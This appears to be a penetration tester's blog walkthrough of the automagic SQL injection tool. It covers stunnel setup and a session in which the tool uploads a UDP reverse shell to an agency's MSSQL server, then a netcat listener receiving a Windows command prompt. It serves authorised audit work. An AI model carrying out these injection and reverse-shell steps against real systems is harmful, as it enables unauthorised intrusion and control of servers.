Automagic
I have used automagic during an audit to enumerate tables and data from a backend database that was accessible from a SQL Injection vulnerability. This tool was successful when the tool that comes with HP Webinspect was not.
The description of automagic from the www.packetstormsecurity.org is as follows:
The automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided as part of the Applied Hacking & Intrusion Prevention training courses. In a nutshell it’s an automated SQL injection tool designed to help save time on pen tests. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned.
The comments from the perl script say that it should be used on a Windows system. However, I had no problems using it on my Linux penetration testing laptop running Ubuntu 8.04. The script does not support SSL which is a problem if the site you are auditing only communicates over port 443. This is rectified by using stunnel to handle the SSL communications. Iām not a fan of stunnel version 4. Below are the instructions on how I got stunnel version 3 running on my Ubuntu 8.04 system. For complete instuctions on how I get all my tools installed on my system see my tutorial here.
#apt-get install libssl-dev zlib1g-dev
Download the latest stunnel version 3
http://www.stunnel.org/download/stunnel/src/stunnel-3.26.tar.gz
#wget http://www.stunnel.org/download/stunnel/src/stunnel-3.26.tar.gz
#tar zxvf stunnel-3.26.tar.gz
#cd stunnel-3.26
#./configure --prefix=/usr --bindir=/usr/bin --sbindir=/usr/bin
#make
#make install
When asked enter the following information (or whatever you agency information is)
Country Name (2 letter code) [PL]:US
State or Province Name (full name) [Some-State]:Georgia
Locality Name (eg, city) []:Atlanta
Organization Name (eg, company) [Stunnel Developers Ltd]:DOAA
Organizational Unit Name (eg, section) []:ISAAS
Common Name (FQDN of your server) [localhost]:audits.state.ga.us
Download automagic from www.packetstormsecurity.org
#wget http://packetstormsecurity.org/UNIX/scanners/automagic.zip
#unzip automagic.zip
Below is a simple demonstration of getting a reverse shell back to my laptop giving me access to the database server as a local administrator.
root@edge-linuxpen:~/automagic# stunnel3 -c -d localhost:80 -r state.govt.agency.us:443
root@edge-linuxpen:~/automagic# perl injector.pl -h localhost -f /APPLICATION/Folder/Authentication.asp -t POST -q YES
[*] Welcome to the Sec-1 Automagical SQL injector [*]
http://www.sec-1.com
Author: Gary O'leary-Steele
Ver: 0.1 Beta
Date: 7/11/05
[!] Please enter the vulnerable POST string placing the keyword
QUERYHERE within the vulnerable POST param.
Note: A command line param -q YES|NO inserts a quote character
before the injected SQL.However if there are any other requirements
such as closing parentheses they should be added here.
e.g Param:username=hello&password=QUERYHERE
Post Param:Submit=Submit&Password=pwned&Username=QUERYHERE
Please select one of the following:
1. Explore Tables (Using CREATE table method)
2. Explore Tables (Using CAST method)
3. Upload and Execute A UDP Reverse Shell
4. Upload A file (Debug Script)
5. Interactive Shell
6. Privilege Escalation Attacks
7. Look for other SQL servers (coming soon)
Where do you want to go today?[1-6]:
Where do you want to go today?[1-6]:3
Enter your IP address:192.168.0.1
Enter you listener port:53
Uploading debug script file to localhost:80
Waiting for Debug to do its work..5 seconds...
4
Please select one of the following:
1. Explore Tables (Using CREATE table method)
2. Explore Tables (Using CAST method)
3. Upload and Execute A UDP Reverse Shell
4. Upload A file (Debug Script)
5. Interactive Shell
6. Privilege Escalation Attacks
7. Look for other SQL servers (coming soon)
Where do you want to go today?[1-6]:
On my laptop I start NetCat to listen for the connection from the database server.
root@edge-linuxpen:~/automagic# nc -vvv -l -u -p 53
listening on [any] 53 ...
connect to [192.168.0.1] from externalhost.state.govt.agency.us [xxx.xxx.xxx.xxx] 48094
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>